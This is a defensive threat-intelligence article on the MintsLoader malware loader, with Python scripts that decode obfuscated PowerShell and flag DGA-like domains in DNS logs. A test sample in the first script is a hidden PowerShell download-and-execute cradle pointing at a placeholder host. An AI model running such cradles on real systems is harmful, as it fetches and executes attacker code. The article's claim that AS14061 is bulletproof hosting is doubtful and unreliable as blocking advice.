
MintsLoader has emerged as a sophisticated malware loader distributing payloads like GhostWeaver, StealC, and a modified BOINC client. Recorded Future’s analysis reveals its multi-stage obfuscation, anti-analysis checks, and use in phishing campaigns targeting industrial and legal sectors [1]. This article breaks down its technical mechanisms, infrastructure, and defensive countermeasures.
TL;DR: Key Findings
- Multi-Stage Loader: Delivers GhostWeaver (banking trojan), StealC (data stealer), and cryptojacking payloads.
- Evasion: JavaScript-to-PowerShell obfuscation, DGA-based C2 communication, VM/sandbox detection.
- Campaigns: Phishing (TAG-124), drive-by downloads (SocGholish), and invoice-themed lures exploiting Italy’s PEC system.
- Defenses: Recorded Future’s AI automates YARA rule generation and tracks DGA shifts.
Technical Analysis of MintsLoader
MintsLoader operates as a two-stage loader. Stage 1 uses obfuscated JavaScript to execute PowerShell scripts fetching Stage 2 payloads. Recorded Future observed Base64-encoded commands like the following snippet [1]:
$encPayload = "JHt2YXJ9PSR7ZW5jfQ==";
iex([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($encPayload)))
Stage 2 implements anti-analysis checks, including VM detection via registry key enumeration and CPUID checks. Its Domain Generation Algorithm (DGA) dynamically creates C2 domains, evading static blocklists. Infrastructure relies on bulletproof hosting providers like SCALAXY-AS and abuses AWS/Azure for payload staging [1].
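As an added example (not code from the Recorded Future report and not MintsLoader's own code), the following Python shows how a SOC can triage the Base64-wrapped PowerShell described above as it appears in process-creation telemetry: it pulls the Base64 literal out of a command line (whether passed to FromBase64String directly, parked in a variable first, or supplied via -EncodedCommand), peels nested layers, and tags behaviours such as iex and download cradles. The two sample command lines are constructed; the first reuses the literal quoted in the snippet above, which decodes to the placeholder text "${var}=${enc}", and the second uses an example.invalid URL.

```python
"""Added example (not from the Recorded Future report or MintsLoader): decode
and triage Base64-wrapped PowerShell command lines of the kind stage 1 emits,
as seen in Sysmon event ID 1 / Windows 4688 telemetry. Samples are constructed.
"""
import base64
import re

# Base64 literal passed straight to FromBase64String("...").
B64_ARG = re.compile(r'FromBase64String\(\s*["\']([A-Za-z0-9+/=]{8,})["\']', re.I)
# Base64 literal parked in a variable ($name = "...") and decoded later.
B64_VAR = re.compile(r'\$(\w+)\s*=\s*["\']([A-Za-z0-9+/=]{8,})["\']')
# powershell -EncodedCommand / -enc / -e <blob>, which is UTF-16LE underneath.
ENC_FLAG = re.compile(r'-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})', re.I)

# Behaviours worth surfacing once every layer has been peeled.
SUSPICIOUS = {
    "invoke_expression": re.compile(r'\biex\b|Invoke-Expression', re.I),
    "download_cradle": re.compile(
        r'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient', re.I),
    "hidden_window": re.compile(r'-w(?:indowstyle)?\s+hidden', re.I),
}


def extract_base64(text):
    """Return the Base64 blobs a decoder in this text would consume, in order."""
    found = [m.group(1) for m in B64_ARG.finditer(text)]
    found += [m.group(1) for m in ENC_FLAG.finditer(text)]
    for name, blob in B64_VAR.findall(text):
        # Only count the variable if something actually decodes it.
        if re.search(r'FromBase64String\(\s*\$' + re.escape(name) + r'\b', text, re.I):
            found.append(blob)
    return list(dict.fromkeys(found))  # de-duplicate, keep order


def decode_layer(blob):
    """Decode one layer: -EncodedCommand is UTF-16LE, FromBase64String usually UTF-8."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) >= 2 and raw[1] == 0:  # ASCII text in UTF-16LE has a NUL every 2nd byte
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def triage(cmdline, max_depth=4):
    """Peel nested Base64 layers; report decoded text and matched behaviours."""
    layers, text = [], cmdline
    for _ in range(max_depth):
        blobs = extract_base64(text)
        if not blobs:
            break
        text = "\n".join(decode_layer(b) for b in blobs)
        layers.append(text)
    everything = "\n".join([cmdline] + layers)
    tags = sorted(name for name, pat in SUSPICIOUS.items() if pat.search(everything))
    return {"layers": layers, "tags": tags}


# Constructed sample 1: the variable-plus-iex pattern quoted in the article.
SAMPLE_FROMB64 = ('$encPayload = "JHt2YXJ9PSR7ZW5jfQ=="; '
                  'iex([System.Text.Encoding]::UTF8.GetString('
                  '[Convert]::FromBase64String($encPayload)))')

# Constructed sample 2: a -enc download cradle, encoded here so the blob is valid UTF-16LE.
SAMPLE_CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_ENC = "powershell -w hidden -enc " + base64.b64encode(
    SAMPLE_CRADLE_TEXT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    for sample in (SAMPLE_FROMB64, SAMPLE_ENC):
        result = triage(sample)
        print("tags:", result["tags"])
        for i, layer in enumerate(result["layers"], 1):
            print(f"  layer {i}: {layer}")
```

The UTF-16LE check is deliberately cheap (a NUL in the second byte) because -EncodedCommand payloads are almost always ASCII PowerShell; a non-ASCII first character would fall through to the UTF-8 branch and produce replacement characters rather than an exception, which keeps the triage loop running over the rest of the batch.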
Recorded Future’s AI-Driven Detection
Recorded Future processes 1.5 million malware samples daily, automating YARA rule creation and behavior tracking. Their platform integrates with Splunk for real-time IoC enrichment, enabling queries like “Show recent GhostWeaver activity in Europe” in plain English [2]. This reduces manual effort for SOC teams analyzing MintsLoader’s evolving TTPs.
Mitigation and Relevance
For defenders, Recorded Future recommends:
- Deploying YARA rules targeting MintsLoader’s PowerShell obfuscation patterns.
- Monitoring DGA-generated domains via DNS logs.
- Blocking known bulletproof hosting ASNs (e.g., AS14061).
Red teams can simulate MintsLoader’s tactics by replicating its multi-stage delivery and DGA-based C2 in controlled environments. Blue teams should prioritize sandbox analysis for JavaScript-initiated PowerShell execution.
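As an added example of the "monitor DGA-generated domains via DNS logs" recommendation (not code from the Recorded Future report, and not a reproduction of MintsLoader's actual DGA), the following Python scores DNS query logs with generic DGA heuristics (label entropy, vowel ratio, digit/letter mixing) and rolls the hits up per client so that a burst of NXDOMAIN answers from one host stands out. The log lines are constructed in a simplified "timestamp client qname rcode" layout; the thresholds are illustrative starting points, not tuned values.

```python
"""Added example (not from the Recorded Future report): flag DGA-like lookups
in DNS query logs and group them per client. Heuristics are generic and the
log lines below are constructed for the example.
"""
import math
from collections import Counter, defaultdict

SAMPLE_DNS_LOG = """\
2025-04-29T10:00:01Z 10.0.0.15 www.microsoft.com NOERROR
2025-04-29T10:00:02Z 10.0.0.15 login.live.com NOERROR
2025-04-29T10:00:02Z 10.0.0.15 stackoverflow.com NOERROR
2025-04-29T10:00:03Z 10.0.0.23 xk3q9zt7vbwl2m.top NXDOMAIN
2025-04-29T10:00:03Z 10.0.0.23 qwp8vzr4kjh2nx.top NXDOMAIN
2025-04-29T10:00:04Z 10.0.0.23 mz7tqkv3xwp9bd.top NXDOMAIN
2025-04-29T10:00:04Z 10.0.0.23 hb4xznq8tvk2wl.top NOERROR
2025-04-29T10:00:05Z 10.0.0.15 update.example.org NOERROR
"""


def shannon_entropy(s):
    """Bits per character of the string's own symbol distribution."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname):
    """Second-level label ('xk3q9zt7vbwl2m' for 'xk3q9zt7vbwl2m.top').
    Simplified: no public-suffix list, so 'bbc.co.uk' would yield 'co'."""
    parts = qname.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(qname):
    """0..3: one point each for high entropy, few vowels, digits mixed with letters."""
    label = registrable_label(qname)
    score = 0
    if len(label) >= 10 and shannon_entropy(label) > 3.3:
        score += 1
    if len(label) >= 8 and sum(ch in "aeiou" for ch in label) / len(label) < 0.2:
        score += 1
    if any(ch.isdigit() for ch in label) and any(ch.isalpha() for ch in label):
        score += 1
    return score


def parse_line(line):
    """Return (client, qname, rcode) or None for a malformed line."""
    fields = line.split()
    if len(fields) != 4:
        return None
    _ts, client, qname, rcode = fields
    return client, qname, rcode


def find_dga_clients(log_text, min_score=2, min_hits=3):
    """Clients with >= min_hits lookups scoring >= min_score, plus their NXDOMAIN count."""
    hits = defaultdict(lambda: {"domains": [], "nxdomain": 0})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, qname, rcode = parsed
        if dga_score(qname) >= min_score:
            hits[client]["domains"].append(qname)
            if rcode == "NXDOMAIN":
                hits[client]["nxdomain"] += 1
    return {c: v for c, v in hits.items() if len(v["domains"]) >= min_hits}


if __name__ == "__main__":
    for client, info in find_dga_clients(SAMPLE_DNS_LOG).items():
        print(f"{client}: {len(info['domains'])} DGA-like lookups, "
              f"{info['nxdomain']} NXDOMAIN")
        for d in info["domains"]:
            print("   ", d, "score", dga_score(d))
```

A long legitimate name such as stackoverflow.com earns one point (entropy alone), which is why the per-client rollup requires a score of at least 2 and several hits: a DGA that cycles through many candidates before one resolves produces exactly the pattern the sample client 10.0.0.23 shows, several high-scoring names in a short window with mostly NXDOMAIN answers.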
Conclusion
MintsLoader exemplifies the trend toward modular, evasive malware. Its use of legitimate cloud services and DGAs complicates detection, but AI-powered tools like Recorded Future’s platform offer scalable countermeasures. Future variants may adopt deepfake-enabled phishing, underscoring the need for adaptive defenses.
References
[1] “Uncovering MintsLoader With Recorded Future Malware Intelligence Hunting.” Recorded Future, 29 Apr. 2025.
[2] “Recorded Future AI Passes the Malware Turing Test.” PR Newswire, 29 Apr. 2025.
[3] “Recorded Future Launches Malware Intelligence to Automate Detection.” SiliconANGLE, 29 Apr. 2025.